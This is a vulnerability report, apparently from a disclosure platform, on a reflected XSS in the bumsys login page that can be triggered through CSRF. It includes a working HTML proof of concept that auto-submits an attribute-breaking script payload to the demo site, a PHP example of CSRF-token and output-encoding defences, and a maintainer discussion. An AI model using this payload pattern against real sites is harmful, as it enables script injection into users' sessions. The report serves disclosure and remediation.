Unauthenticated CSRF to XSS on login page in unilogies/bumsys
Reported on Jan 27th 2023
Description
The user-email parameter is vulnerable to reflected XSS on the login page, which makes it possible to execute JavaScript in the browser of an unauthenticated user.
Because the login form is submitted via a POST request, exploiting the vulnerability requires an HTML PoC page that performs a CSRF against the login form, which in turn triggers the XSS.
Proof of Concept
- Save the following PoC in an empty HTML file:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.bumsys.org/login/" method="POST">
<input type="hidden" name="user-email" value="">"><body onpageshow=alert(document.domain)>" />
<input type="hidden" name="user-password" value="12345678" />
<input type="hidden" name="keepAlive" value="on" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Now open the newly created file in a browser while the user is not authenticated. This is the result:
Impact
It is possible to execute malicious JavaScript code in the victim's browser session.
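As an added example (not bumsys's own code), a minimal PHP login handler showing the two defences this report points to: a per-session anti-CSRF token, so that a cross-site auto-submitting form like the PoC is rejected before any field is processed, and output encoding of the reflected user-email value, so that the PoC payload stays inert inside the value attribute. It assumes a PHP session is available and that the hypothetical authenticate() helper performs the actual credential check.

```php
<?php
// Added example, not the project's code. Assumes a PHP session is available.
session_start();

// 1. Per-session anti-CSRF token. A cross-site POST (like the PoC's
//    auto-submitting form) cannot read this value, so the request is
//    rejected before the submitted fields are touched.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfValid(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// 2. Output encoding. Everything reflected into an HTML attribute is escaped
//    (including quotes), so the report's payload cannot close the value=""
//    attribute and inject a <body onpageshow=...> element.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderLoginForm(string $email, string $error = ''): string {
    return '<form action="/login/" method="POST">'
        . ($error !== '' ? '<p class="error">' . e($error) . '</p>' : '')
        . '<input type="hidden" name="csrf_token" value="' . e(csrfToken()) . '">'
        . '<input type="email" name="user-email" value="' . e($email) . '">'
        . '<input type="password" name="user-password">'
        . '<button type="submit">Login</button>'
        . '</form>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfValid($_POST)) {
        http_response_code(403);
        exit(renderLoginForm('', 'Invalid or missing CSRF token.'));
    }
    $email = (string) ($_POST['user-email'] ?? '');
    // authenticate() is an assumed helper, not shown here.
    if (authenticate($email, (string) ($_POST['user-password'] ?? ''))) {
        header('Location: /dashboard/');
        exit;
    }
    echo renderLoginForm($email, 'Invalid credentials.');
} else {
    echo renderLoginForm('');
}
```

Setting the session cookie with SameSite=Lax (or Strict) adds a second, browser-enforced barrier against the cross-site POST, independent of the token check.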
Thank you so much for reporting this issue. We will fix this in next release.
Thank you for the quick response. Is the report eligible for a CVE once fixed?
@leorac, is there any way to get access to the admin panel by using this issue?
Since this is unauthenticated, it's not possible to exfiltrate cookies in order to take over other users' sessions. That's why I've set it as medium severity. Anyway, it's possible to use this issue chained with other vulnerabilities and for tracking user behaviour.
CVE assignment is up to the maintainer, please refrain from tagging admins for this request. Thanks!